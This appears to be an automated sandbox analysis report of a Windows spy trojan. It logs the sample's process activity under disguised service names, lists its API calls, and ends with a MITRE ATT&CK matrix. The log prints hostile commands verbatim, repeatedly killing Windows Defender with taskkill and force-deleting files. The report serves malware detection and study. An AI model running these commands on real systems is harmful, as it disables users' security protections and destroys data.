Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×7)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×4)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×15)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×2)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×7)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown (×6)
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe (×4)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe (×12)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C788D660 cpuid 0_2_00007FF6C788D660
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF6C788792C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,0_2_00007FF6C78877F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF6C7887748
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF6C7886ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,0_2_00007FF6C787B6D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,0_2_00007FF6C78875F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF6C78873A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: EnumSystemLocalesW,0_2_00007FF6C7887308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: EnumSystemLocalesW,0_2_00007FF6C7887238
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: EnumSystemLocalesW,0_2_00007FF6C787B258
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: GetLocaleInfoW,0_2_00007FF6C78902B0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,5_2_00007FF76E1ADF40
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,5_2_00007FF76E1AD820
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF76E1AE098
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: EnumSystemLocalesW,5_2_00007FF76E1ADB88
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: EnumSystemLocalesW,5_2_00007FF76E1ADC58
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: EnumSystemLocalesW,5_2_00007FF76E1A24C8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF76E1ADCF0
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,5_2_00007FF76E1A2948
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,5_2_00007FF76E1AE148
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF76E1AE27C
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: GetLocaleInfoW,5_2_00007FF76E1B72B0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,25_2_00007FF71DDAB6D8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,25_2_00007FF71DDB6ED0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,25_2_00007FF71DDB75F0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,25_2_00007FF71DDB77F8
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_00007FF71DDB7748
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: EnumSystemLocalesW,25_2_00007FF71DDB7308
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,25_2_00007FF71DDC02B0
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: EnumSystemLocalesW,25_2_00007FF71DDAB258
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: EnumSystemLocalesW,25_2_00007FF71DDB7238
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,25_2_00007FF71DDB792C
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,25_2_00007FF71DDB73A0
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (×6)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7868324 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6C7868324
MITRE ATT&CK matrix, listed by tactic (a leading number is the count the report shows for a matched technique; techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 3 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 5 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 5 Windows Service; 11 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 221 Masquerading; 21 Disable or Modify Tools; 1 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 33 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
